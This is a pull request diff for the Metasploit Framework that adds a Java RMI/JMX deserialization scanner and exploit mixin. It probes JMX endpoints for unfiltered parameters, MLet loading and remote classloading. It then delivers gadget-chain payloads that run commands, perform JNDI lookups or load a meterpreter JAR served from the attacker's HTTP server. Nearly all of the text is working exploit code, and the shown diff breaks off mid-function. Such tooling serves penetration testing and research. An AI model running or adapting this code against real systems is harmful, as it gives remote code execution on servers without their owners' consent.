### PR TITLE
RMI/JMX serialization scanner/exploit

### DIFF
--- a/lib/msf/core/exploit/java/serialized.rb
+++ b/lib/msf/core/exploit/java/serialized.rb
@@ -2,6 +2,7 @@
 
 require 'rex/java/serialization/generator'
 require 'rex/java/classfile'
+require 'rex/text'
 
 module Msf
   module Exploit::Java::Serialized
@@ -19,7 +20,7 @@ module Msf
       vectors = collect
       unless vectors.empty?
         vectors.each do |vector|
-          info vector.to_s
+          print_status vector.to_s
         end
         return Exploit::CheckCode::Appears
       end
@@ -101,8 +102,7 @@ module Msf
         'com/metasploit/meterpreter/MemoryBufferURLStreamHandler.class',
         'com/metasploit/meterpreter/MemoryBufferURLConnection.class',
       ]
-      rand = (0...8).map { (65 + rand(26)).chr }.join
-      loadername = 'Translet' + rand
+      loadername = "Translet#{Rex::Text.rand_text_alpha_upper(8)}"
       bytecode =  Rex::Java::Classfile::Templates.patch_loader(
         MetasploitPayloads.read("java", translet), 
         loadername, 
@@ -119,8 +119,8 @@ module Msf
       jar = payload.encoded_jar
       manifest = extract_file(jar, "META-INF/MANIFEST.MF")
       mainclass = nil
-      manifest.split("\r\n").each do |line|
-        mainclass = line.split()[1] if line.downcase.start_with?("main-class: ")
+      manifest.each_line do |line|
+        mainclass = line.strip.split()[1] if line.downcase.start_with?("main-class: ")
       end
 
       print_error('Failed to determine main class') if mainclass.nil?

--- a/lib/msf/core/exploit/java/serialized.rb
+++ b/lib/msf/core/exploit/java/serialized.rb
@@ -18,7 +18,7 @@ module Msf
 
     def check
       vectors = collect
-      unless vectors.empty?
+      unless not vectors.nil? and vectors.empty?
         vectors.each do |vector|
           print_status vector.to_s
         end

--- a/lib/msf/core/exploit/java/serialized.rb
+++ b/lib/msf/core/exploit/java/serialized.rb
@@ -1,0 +1,200 @@
+# -*- coding: binary -*-
+
+require 'rex/java/serialization/generator'
+require 'rex/java/classfile'
+
+module Msf
+  module Exploit::Java::Serialized
+    include Msf::Exploit::Remote::HttpServer
+
+    def initialize(info = {})
+      super
+
+      register_options([
+        OptString.new('GADGETS', [false, 'Gadgets to use in exploitation', ''])
+      ])
+    end
+
+    def check
+      vectors = collect
+      unless vectors.empty?
+        vectors.each do |vector|
+          info vector.to_s
+        end
+        return Exploit::CheckCode::Appears
+      end
+      Exploit::CheckCode::Safe
+    end
+
+    def exploit
+      start_service
+
+      vectors = collect
+      vectors.each do |vector|
+        if session_created?
+          print_status 'Have a session, not trying further'
+          break
+        end
+        do_exploit(vector)
+      end
+
+      handler(nil)
+      unless vectors.empty?
+        begin
+          print_status 'Waiting for exploit to complete...'
+          Timeout.timeout(datastore['ListenerTimeout']) do
+            loop do
+              break if session_created?
+              Rex.sleep(0.25)
+            end
+
+            print_status 'Have session...'
+          end
+        rescue ::Timeout::Error
+          fail_with(Failure::Unknown, 'Timeout waiting for exploit to complete')
+        end
+      end
+
+      stop_service
+    end
+
+
+    class DatastoreRunConfig < Rex::Java::Serialization::Generator::GeneratorConfig
+      def initialize(props)
+        @props = props
+      end
+
+      def gadgets
+        @props['GADGETS']
+      end
+    end
+
+    def create_config(datastore)
+      DatastoreRunConfig.new(datastore)
+    end
+
+    def payloads(ctx, &block)
+      config = create_config(datastore)
+      p = create_params(ctx)
+      gadgets = Rex::Java::Serialization::Generator::BuiltinGadgets.new
+      matches = gadgets.find(ctx, params: p, rc: config)
+      if block
+        matches.each do |match|
+          yield match.create(ctx, params: p)
+        end
+      else
+        payloads = []
+        matches.each do |match|
+          payloads.push(match.create(ctx, params: p))
+        end
+        payloads
+      end
+    end
+
+    def loader_classes(jar, mainclass, xalan: false)
+      translet = 'metasploit/TransletPayload.class'
+      if xalan
+        translet = 'metasploit/TransletXalanPayload.class'
+      end
+
+      includes = [
+        'com/metasploit/meterpreter/MemoryBufferURLStreamHandler.class',
+        'com/metasploit/meterpreter/MemoryBufferURLConnection.class',
+      ]
+      rand = (0...8).map { (65 + rand(26)).chr }.join
+      loadername = 'Translet' + rand
+      bytecode =  Rex::Java::Classfile::Templates.patch_loader(
+        MetasploitPayloads.read("java", translet), 
+        loadername, 
+        jar, 
+        mainclass:mainclass)
+      classes = [['metasploit/' + loadername, bytecode]]
+      includes.each do |include|
+        classes += [[include, MetasploitPayloads.read("java", include)]]
+      end
+      classes
+    end
+
+    def create_templates_jar_loader(payload, xalan: false)
+      jar = payload.encoded_jar
+      manifest = extract_file(jar, "META-INF/MANIFEST.MF")
+      mainclass = nil
+      manifest.split("\r\n").each do |line|
+        mainclass = line.split()[1] if line.downcase.start_with?("main-class: ")
+      end
+
+      print_error('Failed to determine main class') if mainclass.nil?
+      print_status('Trying to invoke bytecode, main class ' + mainclass)
+
+
+      loader_classes(jar.pack, mainclass)
+    end
+
+    def create_params(ctx)
+      # TODO: randomize static payload class name
+      gparams = { 
+        'classpath' => get_uri + '/',
+        'class' => 'metasploit.StaticPayload'
+      }
+
+      ptype = payload_instance.fullname
+      if ptype == 'payload/cmd/unix/generic' ||
+          ptype == 'payload/cmd/windows/generic'
+        print_status('Trying direct command execution ' + payload.raw)
+        gparams["cmd"] = payload.raw
+      elsif ptype == 'payload/java/jndi'
+        jndiurl = payload_instance.datastore["JNDI_URL"]
+        print_status('Trying to invoke JNDI lookup to ' + jndiurl + ' additional setup required')
+        gparams["jndiurl"] = jndiurl
+      else
+        jar = payload.encoded_jar
+        bytecodes = create_templates_jar_loader(
+          payload,
+          xalan: Rex::Java::Serialization::Generator::Templates::use_xalan?(ctx))
+        gparams['classfiles'] = bytecodes
+      end
+      gparams
+    end
+
+    def extract_file(zip,name)
+      zip.entries.each do |entry|
+        return entry.data if entry.name == name
+      end 
+    end
+
+    def extra_http_classes
+      []
+    end
+
+    def get_jar
+      if @jar.nil?
+        p = regenerate_payload(cli)
+        @jar = p.encoded_jar({"random":true})
+        @jar.add_files(extra_http_classes, MetasploitPayloads.path('java'))
+      end
+      @jar
+    end
+
+    def on_request_uri(cli, request)
+      jar = get_jar
+      if request.uri =~ /\.jar$/i
+        send_response(cli, jar.pack, {
+          'Content-Type' => 'application/java-archive',
+          'Pragma'       => 'no-cache'
+        })
+        print_status('Replied to request for payload JAR')
+      else
+        print_status('Request for file ' + request.uri)
+        contents = extract_file(jar,request.uri)
+        if contents.nil?
+          send_not_found(cli)
+        else
+          send_response(cli,contents, {
+            'Content-Type' => 'application/octet-stream',
+            'Pragma'       => 'no-cache'
+          })
+        end
+      end
+    end
+  end
+end

--- a/lib/msf/core/exploit/java/serialized/rmi.rb
+++ b/lib/msf/core/exploit/java/serialized/rmi.rb
@@ -1,5 +1,4 @@
 # -*- coding: binary -*-
-require 'msf/core'
 require 'rex/java/jrmp'
 require 'rex/java/serialization/probe'
 
@@ -9,7 +8,7 @@ module Msf
 
     class AttackVector
     end
-  
+
     autoload :PropRunConfig, 'msf/core/exploit/java/serialized/rmi/config'
 
     autoload :RMICheck, 'msf/core/exploit/java/serialized/rmi/runner'

--- a/lib/msf/core/exploit/java/serialized/rmi.rb
+++ b/lib/msf/core/exploit/java/serialized/rmi.rb
@@ -1,0 +1,22 @@
+# -*- coding: binary -*-
+require 'msf/core'
+require 'rex/java/jrmp'
+require 'rex/java/serialization/probe'
+
+
+module Msf
+  module Exploit::Java::Serialized::RMI
+
+    class AttackVector
+    end
+  
+    autoload :PropRunConfig, 'msf/core/exploit/java/serialized/rmi/config'
+
+    autoload :RMICheck, 'msf/core/exploit/java/serialized/rmi/runner'
+
+    autoload :ReferenceProber, 'msf/core/exploit/java/serialized/rmi/reference'
+    autoload :RMIProber, 'msf/core/exploit/java/serialized/rmi/rmi'
+    autoload :JMXProber, 'msf/core/exploit/java/serialized/rmi/jmx'
+
+  end
+end

--- a/lib/msf/core/exploit/java/serialized/rmi/config.rb
+++ b/lib/msf/core/exploit/java/serialized/rmi/config.rb
@@ -1,0 +1,48 @@
+# -*- coding: binary -*-
+
+module Msf
+  module Exploit::Java::Serialized::RMI
+
+    class PropRunConfig < Rex::Java::Serialization::Generator::GeneratorConfig
+      def initialize(props)
+        @props = props
+      end
+
+      def checkRefs?
+        @props.fetch('CHECK_REFS')
+      end
+
+      def followRemoteRefs?
+        @props.fetch('FOLLOW_REMOTE_REFS')
+      end
+
+      def tryDeser?
+        @props.fetch('TRY_DESER')
+      end
+
+      def tryMlet?
+        @props.fetch('TRY_MLET')
+      end
+
+      def tryClassload?
+        @props.fetch('TRY_CLASSLOAD')
+      end
+
+      def gadgets
+        @props['GADGETS']
+      end
+
+      def methodHash
+        @props['METHOD_HASH']
+      end
+
+      def methodId
+        @props['METHOD_ID'] || -1
+      end
+
+      def methodSignature
+        @props['METHOD_SIGNATURE']
+      end
+    end
+  end
+end

--- a/lib/msf/core/exploit/java/serialized/rmi/config.rb
+++ b/lib/msf/core/exploit/java/serialized/rmi/config.rb
@@ -8,23 +8,23 @@ module Msf
         @props = props
       end
 
-      def checkRefs?
+      def check_refs?
         @props.fetch('CHECK_REFS')
       end
 
-      def followRemoteRefs?
+      def follow_remote_refs?
         @props.fetch('FOLLOW_REMOTE_REFS')
       end
 
-      def tryDeser?
+      def try_deser?
         @props.fetch('TRY_DESER')
       end
 
-      def tryMlet?
+      def try_mlet?
         @props.fetch('TRY_MLET')
       end
 
-      def tryClassload?
+      def try_classload?
         @props.fetch('TRY_CLASSLOAD')
       end
 
@@ -32,15 +32,15 @@ module Msf
         @props['GADGETS']
       end
 
-      def methodHash
+      def method_hash
         @props['METHOD_HASH']
       end
 
-      def methodId
+      def method_id
         @props['METHOD_ID'] || -1
       end
 
-      def methodSignature
+      def method_signature
         @props['METHOD_SIGNATURE']
       end
     end

--- a/lib/msf/core/exploit/java/serialized/rmi/jmx.rb
+++ b/lib/msf/core/exploit/java/serialized/rmi/jmx.rb
@@ -1,0 +1,701 @@
+# -*- coding: binary -*-
+
+module Msf
+  module Exploit::Java::Serialized::RMI
+
+    class JMXInvokeDeserVector < RMICallDeserVector
+      # this should take the RMIServer information,
+      # actual connection is made here
+      def	initialize(host, port, objId, uid: nil, ssl: false, creds: nil, ctx: nil, name: nil, method: nil)
+        super(host, port, objId, uid: uid, ssl: ssl, ctx: ctx)
+        @creds = creds
+        @name = name
+        @method = method
+      end
+
+      def id
+        ['deser', @host, @port, @ctx.gadgets]
+      end
+
+      def prio
+        50
+      end
+
+      def deliver(payl)
+        client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @ctx.reg, ssl: @ssl)
+        # newClient
+        jmxref = Rex::Java::JRMP.Util.unwrap_ref(
+          client.call(@objId, -1, -1089742558549201240, [@creds], uid: @uid)
+        )
+
+        args = [
+          Rex::Java::Serialization::Metamodel::JavaObject.new('Ljavax/management/ObjectName;', @name),
+          @method,
+          Rex::Java::JRMP::Util.make_marshalledobject(
+            Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/Object;', [payl]), ctx.reg
+          ),
+          Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;', ['java.lang.String']),
+          nil
+        ]
+
+        begin
+          client.call(jmxref['objid'], -1, 1434350937885235744, args, uid: jmxref['uid'])
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP.unwrap_exception(e.ex)
+          type = root[0][0]
+          if type == 'java.lang.IllegalArgumentException'
+            return true
+          else
+            raise
+          end
+        end
+      end
+
+      def inspect
+        format('JMX invoke to %s:%d method %s::%s: Deserialization %s', @host, @port, @name, @method, @ctx.gadgets.to_a.to_s)
+      end
+    end
+
+    class JMXCallDeserVector < RMICallDeserVector
+      # this should take the RMIServer information,
+      # actual connection is made here
+      def	initialize(host, port, objId, uid: nil, methodId: -1, methodHash: 0, ssl: false, baseargs: [nil], argidx: 0, creds: nil, ctx: nil)
+        super(host, port, objId, uid: uid, methodHash: methodHash, ssl: ssl, baseargs: baseargs, argidx: argidx, ctx: ctx)
+        @creds = creds
+      end
+
+      def id
+        ['deser', @host, @port, @ctx.gadgets]
+      end
+
+      def prio
+        20
+      end
+
+      def deliver(payl)
+        args = @baseargs.dup
+        args[@argidx] = payl
+
+        client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @ctx.reg, ssl: @ssl)
+        # newClient
+        jmxref = Rex::Java::JRMP::Util.unwrap_ref(
+          client.call(@objId, -1, -1089742558549201240, [@creds], uid: @uid)
+        )
+        client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @ctx.reg, ssl: @ssl)
+
+        begin
+          client.call(jmxref['objid'], -1, @methodHash, args, uid: jmxref['uid'])
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+          type = root[0][0]
+          if type == 'java.lang.IllegalArgumentException'
+            return true
+          else
+            raise
+          end
+        end
+      end
+
+      def inspect
+        format('JMX call to %s:%d method %d: Deserialization %s', @host, @port, @methodHash, @ctx.gadgets.to_a.to_s)
+      end
+    end
+
+    class JMXMLetVector < RMICallArgumentVector
+      def	initialize(host, port, objId, uid: nil, ssl: false, creds: nil, name: nil, reg: nil)
+        super(host, port, objId, uid: uid, ssl: ssl)
+        @creds = creds
+        @name = name
+        @reg = reg
+      end
+
+      def id
+        ['mlet', @host, @port]
+      end
+
+      def prio
+        -50
+      end
+
+      def deliver(payl)
+        client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @reg, ssl: @ssl)
+        # newClient
+        jmxref = Rex::Java::JRMP::Util.unwrap_ref(
+          client.call(@objId, -1, -1089742558549201240, [@creds], uid: @uid)
+        )
+        args = ['javax.management.loading.MLet', @name, nil]
+
+        # createMBean(Ljava/lang/String;Ljavax/management/ObjectName;Ljavax/security/auth/Subject;)Ljavax/management/ObjectInstance; 2510753813974665446
+        begin
+          client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @reg, ssl: @ssl)
+          client.call(jmxref['objid'], -1, 2510753813974665446, args, uid: jmxref['uid'])
+          Util.info 'Created MLet bean instance'
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+          raise if root[0][0] != 'javax.management.InstanceAlreadyExistsException'
+          Util.info 'MLet bean instance already exists'
+        rescue ::Exception => e
+          Util.error 'Failed to create MLet instance: ' + e.to_s
+        end
+
+        # invoke(Ljavax/management/ObjectName;Ljava/lang/String;Ljava/rmi/MarshalledObject;[Ljava/lang/String;Ljavax/security/auth/Subject;)Ljava/lang/Object; 1434350937885235744
+
+        args = [@name, 
+                'getMBeansFromURL',
+                Rex::Java::JRMP::Util.make_marshalledobject(
+                  Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/Object;',
+                                                                     [payl]), @reg),
+                Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;', 
+                                                                   ['java.lang.String']), 
+                nil]
+
+        begin
+          client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @reg, ssl: @ssl)
+          r = client.call(jmxref['objid'], -1, 1434350937885235744, args, uid: jmxref['uid'])
+
+          if !r[1].key?('elements') || 
+              r[1]['elements'].empty? || 
+              r[1]['elements'][0].empty? ||
+              r[1]['elements'][0][1].empty? ||
+              r[1]['elements'][0][1]['name'].nil?
+            Util.error 'MBean creation seems to have failed, response ' + r.to_s
+            return
+          end
+
+          on = r[1]['elements'][0][1]['name']
+          args = [
+            Rex::Java::Serialization::Metamodel::JavaObject.new('Ljavax/management/ObjectName;',
+                                                                'name' => on[1]['name']),
+            'run',
+            Rex::Java::JRMP::Util.make_marshalledobject(
+              Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/Object;', []), @reg
+            ),
+            Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;', []), 
+            nil
+          ]
+
+          client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @reg, ssl: @ssl)
+          r = client.call(
+            jmxref['objid'], 
+            -1, 
+            1434350937885235744, 
+            args, 
+            uid: jmxref['uid'])
+
+        rescue Rex::Java::JRMP::JRMPError => e
+          raise
+        rescue ::Exception => e
+          Util.error 'Failed to create MBean via MLet: ' + e.to_s
+          raise
+        rescue Timeout::Error
+          Util.error 'Timeout waiting for MBean creation'
+        end
+      end
+
+      def inspect
+        format('JMX MLet loading on %s:%d', @host, @port)
+      end
+    end
+
+    class JMXProber < ReferenceProber
+      attr_reader :auth
+
+      @@builtins = [
+        'java.lang:type=MemoryPool,name=Metaspace',
+        'java.lang:name=Metaspace,type=MemoryPool',
+        'java.lang:type=MemoryPool,name=PS Old Gen',
+        'java.lang:type=MemoryPool,name=Compressed Class Space',
+        'java.lang:name=Compressed Class Space,type=MemoryPool',
+        'java.lang:type=MemoryPool,name=PS Eden Space',
+        'java.lang:type=MemoryPool,name=Code Cache',
+        'java.lang:type=MemoryPool,name=PS Survivor Space',
+        'java.lang:name=Survivor Space,type=MemoryPool',
+        'java.lang:name=Tenured Gen,type=MemoryPool',
+        'java.lang:name=Eden Space,type=MemoryPool',
+        'java.lang:name=CodeHeap \'profiled nmethods\',type=MemoryPool',
+        'java.lang:name=CodeHeap \'non-nmethods\',type=MemoryPool',
+        'java.lang:name=CodeHeap \'non-profiled nmethods\',type=MemoryPool',
+        'java.lang:type=GarbageCollector,name=PS Scavenge',
+        'java.lang:type=GarbageCollector,name=PS MarkSweep',
+        'java.lang:name=MarkSweepCompact,type=GarbageCollector',
+        'java.lang:name=Copy,type=GarbageCollector',
+        'java.lang:type=MemoryManager,name=CodeCacheManager',
+        'java.lang:name=CodeCacheManager,type=MemoryManager',
+        'java.lang:type=MemoryManager,name=Metaspace Manager',
+        'java.lang:name=Metaspace Manager,type=MemoryManager',
+        'java.lang:type=Runtime',
+        'java.lang:type=Threading',
+        'java.lang:type=OperatingSystem',
+        'java.lang:type=Compilation',
+        'java.lang:type=Memory',
+        'java.nio:type=BufferPool,name=direct',
+        'java.nio:name=direct,type=BufferPool',
+        'java.nio:type=BufferPool,name=mapped',
+        'java.nio:name=mapped,type=BufferPool',
+        'java.util.logging:type=Logging',
+        'java.lang:type=ClassLoading',
+        'com.sun.management:type=HotSpotDiagnostic',
+        'com.sun.management:type=DiagnosticCommand',
+        'jdk.management.jfr:type=FlightRecorder',
+        'JMImplementation:type=MBeanServerDelegate',
+      ]
+
+      def initialize(name, ref, reg, connhost, jmxcreds: nil, rc: nil)
+        super(name, ref, reg, connhost, rc)
+
+        @skip = false
+        @jmxconnref = nil
+        @needauth = true
+        @auth = false
+        @jmxcreds = jmxcreds
+        @rc = rc
+        begin
+          @jmxver = send(-1, -8081107751519807347, [])
+          Util.info 'JMX Version: ' + @jmxver.strip
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+          type = root[0][0]
+          if name == 'jmxrmi'
+            raise
+          else
+            Util.info 'Does not appear a be a JMX service'
+            @skip = true
+          end
+        end
+      end
+
+      def test_call(payl, reg, params)
+        args = params['args']
+        args[params['argidx']] = payl
+        begin
+          send(-1, params['methodhash'], args, customreg: reg)
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+          type = root[0][0]
+          if type == 'java.lang.IllegalArgumentException'
+            return
+          else
+            return type
+          end
+        end
+      end
+
+      def sendClient(methodhash, args, location: nil, customreg: nil)
+        return if @jmxconnref.nil?
+
+        reg = @reg
+        unless customreg.nil?
+          customreg.load('model/rmi.json')
+          reg = customreg
+        end
+
+        client = Rex::Java::JRMP::JRMPClient.new(@host, @port, reg, location: location, ssl: @ssl)
+        client.call(@jmxconnref['objid'], -1, methodhash, args, uid: @jmxconnref['uid'])
+      end
+
+      def run
+        vectors = []
+        return if @skip
+
+        vectors += run_auth
+        return if @jmxconnref.nil?
+
+        begin
+          connid = sendClient(-67907180346059933, [])
+          Util.info 'JMX connection valid, id: ' + connid
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+          Util.error root.to_s
+        end
+
+        vectors += run_param_filter
+        vectors += run_mlet if @rc.tryMlet?
+        vectors += run_object_enum
+        vectors
+      end
+
+      def close
+        begin
+          Util.info 'Trying to close JMX connection'
+          sendClient(-4742752445160157748, [])
+        rescue ::Exception
+        end
+        @jmxconnref = nil
+      end
+
+      def run_auth
+        vectors = []
+        filtered = false
+        classload = false
+        begin
+          url = Rex::Java::Serialization::Metamodel::JavaObject.new('Ljava/net/URL;', 
+                                                                    'protocol' => 'http',
+                                                                    'host' => 'test.invalid',
+                                                                    'hashCode' => -1)
+          o = send(-1, -1089742558549201240, [url])
+          Util.info 'JMX does not appear to require authentication'
+          unless @rc.tryMlet?
+            Util.vuln 'This usually means that MLet loading is allowed'
+          end
+          Util.vuln 'JMX auth (newClient) does not filter parameters'
+          classload = @rc.tryClassload? && Util.test_remoteclassloading(@host, 
+                                                                        @port, 
+                                                                        @reg, 
+                                                                        @objid, 
+                                                                        @uid, 
+                                                                        -1,
+                                                                        -1089742558549201240, 
+                                                                        ssl: @ssl)
+          @jmxconnref = Rex::Java::JRMP::Util.unwrap_ref(o)
+          @needauth = false
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+          type = root[0][0]
+          if type == 'java.io.InvalidClassException' ||
+              (type == 'java.lang.ClassCastException' &&
+               root[1]['detailMessage'].start_with?('Unsupported type:'))
+          Util.okay 'JMX auth filters parameter types'
+          filtered = true
+          @needauth = false
+          elsif type == 'java.lang.SecurityException'
+            Util.vuln 'JMX auth required, but unfiltered parameters'
+            classload = @rc.tryClassload? && Util.test_remoteclassloading(@host, 
+                                                                          @port, 
+                                                                          @reg, 
+                                                                          @objid, 
+                                                                          @uid, 
+                                                                          -1, 
+                                                                          -1089742558549201240, 
+                                                                          ssl: @ssl)
+            @auth = true
+          elsif type == 'java.lang.ClassCastException'
+            Util.vuln 'JMX auth (newClient) does not filter parameters'
+            classload = @rc.tryClassload? && Util.test_remoteclassloading(@host, 
+                                                                          @port, 
+                                                                          @reg, 
+                                                                          @objid, 
+                                                                          @uid, 
+                                                                          -1, 
+                                                                          -1089742558549201240, 
+                                                                          ssl: @ssl)
+          else
+            Util.error 'JMX connection failed: ' + type
+          end
+        end
+
+        if classload
+          vectors.push(RMIClassLoadingVector.new(@host, 
+                                                 @port, 
+                                                 @objid, 
+                                                 uid: @uid,
+                                                 methodHash: -1089742558549201240,
+                                                 ssl: @ssl))
+        end
+
+        if @rc.tryDeser? && !filtered
+          ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg, 
+                                                                           params: {
+            'objid' => @objid,
+            'methodhash' => -1089742558549201240,
+            'argidx' => 0,
+            'args' => [nil]
+          })
+
+          strategy = Rex::Java::Serialization::Probe::ExceptionProbeStrategy.new(method(:test_call))
+          strategy.init(ctx)
+
+          if ctx.run(strategy)
+            vectors.push(RMICallDeserVector.new(@host, 
+                                                @port, 
+                                                @objid,
+                                                uid: @uid,
+                                                methodHash: -1089742558549201240, 
+                                                ssl: @ssl,
+                                                ctx: ctx))
+          end
+        end
+
+        if @jmxconnref.nil? && @needauth && @jmxcreds.nil?
+          Util.error 'Further checks would require credentials'
+        elsif @jmxconnref.nil?
+          if !@jmxcreds.nil?
+            Util.info 'Trying authenticated JMX connection'
+            @auth = true
+          else
+            Util.info 'Trying unauthenticated JMX connection'
+          end
+          begin
+            o = send(-1, -1089742558549201240, [@jmxcreds])
+            @jmxconnref = Rex::Java::JRMP::Util.unwrap_ref(o)
+            Util.info 'Connection established successfully'
+            if !@auth && !@rc.tryMlet?
+              Util.vuln 'This usually means that MLet loading is allowed'
+            end
+          rescue Rex::Java::JRMP::JRMPError => e
+            root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+            type = root[0][0]
+            if type == 'java.lang.SecurityException'
+              Util.error 'Invalid Credentials: ' + root[1]['detailMessage']
+              @auth = true
+            else
+              raise
+            end
+          end
+        end
+        vectors
+      end
+
+      def trylogin(user, pass)
+        creds = Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;', [user, pass])
+        send(-1, -1089742558549201240, [creds])
+        return true
+      rescue Rex::Java::JRMP::JRMPError => e
+        root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+        type = root[0][0]
+        if type == 'java.lang.SecurityException'
+          return false
+        else
+          raise
+        end
+      end
+
+      def send_param(payl, reg, params)
+        args = params['args']
+        args[params['argidx']] = payl
+        sendClient(params['methodhash'], args, customreg: reg)
+      rescue Rex::Java::JRMP::JRMPError => e
+        root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+        type = root[0][0]
+        if type == 'java.lang.IllegalArgumentException'
+          return
+        else
+          return type
+        end
+      end
+
+      def run_param_filter
+        vectors = []
+        filtered = false
+        begin
+          url = Rex::Java::Serialization::Metamodel::JavaObject.new('Ljava/net/URL;', 
+                                                                    'protocol' => 'http',
+                                                                    'host' => 'test.invalid',
+                                                                    'hashCode' => -1)
+          sendClient(-2042362057335820635, [url])
+          raise 'Should not succeed'
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+          type = root[0][0]
+          if type == 'java.io.InvalidClassException'
+            Util.okay 'JMX getMBeanCount has filtering (please provide detail to author)'
+            filtered = true
+          elsif type == 'java.lang.ClassCastException' ||
+            (type == 'java.lang.IllegalArgumentException' &&
+             (root[1]['detailMessage'] == 'argument type mismatch' ||
+              root[1]['detailMessage'].start_with?('java.lang.ClassCastException')))
+          Util.vuln 'JMX getMBeanCount does not filter parameters'
+          else
+            raise
+          end
+        end
+
+        if @rc.tryClassload? && 
+            Util.test_remoteclassloading(@host,
+                                         @port, 
+                                         @reg, 
+                                         @jmxconnref['objid'], 
+                                         @jmxconnref['uid'], 
+                                         -1, 
+                                         -2042362057335820635, 
+                                         ssl: @ssl)
+          vectors.push(RMIClassLoadingVector.new(@host, 
+                                                 @port, 
+                                                 @jmxconnref['objid'],
+                                                 uid: @jmxconnref['uid'],
+                                                 methodHash: -2042362057335820635,
+                                                 ssl: @ssl))
+        end
+
+        return vectors if filtered || !@rc.tryDeser?
+
+        ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg, 
+                                                             params: {
+          'methodhash' => -2042362057335820635,
+          'args' => [nil],
+          'argidx' => 0
+        })
+        strategy = Rex::Java::Serialization::Probe::ExceptionProbeStrategy.new(method(:send_param))
+        strategy.init(ctx)
+
+        if ctx.run(strategy)
+          vectors.push(JMXCallDeserVector.new(@host, 
+                                              @port, 
+                                              @objid, 
+                                              ssl: @ssl,
+                                              creds: @jmxcreds,
+                                              ctx: ctx,
+                                              uid: @uid,
+                                              methodHash: -2042362057335820635))
+        end
+        vectors
+      end
+
+      def send_invoke(payl, reg, params)
+        sendClient(1434350937885235744, [
+          Rex::Java::Serialization::Metamodel::JavaObject.new('Ljavax/management/ObjectName;', 
+                                                              params['name']),
+          'test',
+          Rex::Java::JRMP::Util.make_marshalledobject(
+            Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/Object;', [payl]), 
+            reg
+          ),
+          Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;', 
+                                                             ['java.lang.String']),
+          nil
+        ])
+      rescue Rex::Java::JRMP::JRMPError => e
+        root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+        type = root[0][0]
+        if type == 'java.lang.IllegalArgumentException'
+          return
+        else
+          return type
+        end
+      end
+
+      def run_object_enum
+        vectors = []
+        objects = []
+        begin
+          args = [
+            Rex::Java::Serialization::Metamodel::JavaObject.new('Ljavax/management/ObjectName;',{}), 
+            nil, 
+            nil
+          ]
+          o = sendClient(9152567528369059802, args)
+          objects = o[1]['elements']
+          Util.info 'Found ' + objects.length.to_s + ' JMX objects, checking for available gadgets...'
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP::Data.unwrap_exception(e.ex)
+          type = root[0][0]
+          Util.error 'JMX enumeration failed: ' + type + ' - ' + root[1]['detailMessage']
+        end
+
+        # invoke(Ljavax/management/ObjectName;Ljava/lang/String;Ljava/rmi/MarshalledObject;[Ljava/lang/String;Ljavax/security/auth/Subject;)Ljava/lang/Object; 1434350937885235744
+
+        objects.each do |obj|
+          on = obj[1]['name']
+          # builtin objects should have the system or app classloader that can be
+          # reached with other vectors
+          next if @@builtins.include?(on)
+          Util.info "Checking object " + on
+          begin
+            sendClient(1434350937885235744, [
+              Rex::Java::Serialization::Metamodel::JavaObject.new('Ljavax/management/ObjectName;', 
+                                                                  obj[1]),
+              'test',
+              Rex::Java::JRMP::Util.make_marshalledobject(
+                Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/Object;', []), 
+                @reg
+              ),
+              Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;', 
+                                                                 ['java.lang.String']),
+              nil
+            ])
+          rescue Rex::Java::JRMP::JRMPError => e
+            root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+            type = root[0][0]
+
+            if type != 'javax.management.ReflectionException' && type != 'java.lang.SecurityException'
+              if !root[1]['detailMessage'].nil?
+                Util.error 'JMX invoke on ' + obj[1]['name'] + ' unexpected error: ' + type + ' - ' + root[1]['detailMessage']
+              else
+                Util.error 'JMX invoke on ' + obj[1]['name'] + ' unexpected error: ' + type + ' - '
+              end
+              next
+            end
+          end
+
+          next unless @rc.tryDeser?
+
+          ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg, params: {
+            'name' => obj[1]
+          })
+          strategy = Rex::Java::Serialization::Probe::ExceptionProbeStrategy.new(method(:send_invoke))
+          strategy.init(ctx)
+
+          next unless ctx.run(strategy)
+          vectors.push(JMXInvokeDeserVector.new(@host, 
+                                                @port, 
+                                                @objid, 
+                                                ssl: @ssl,
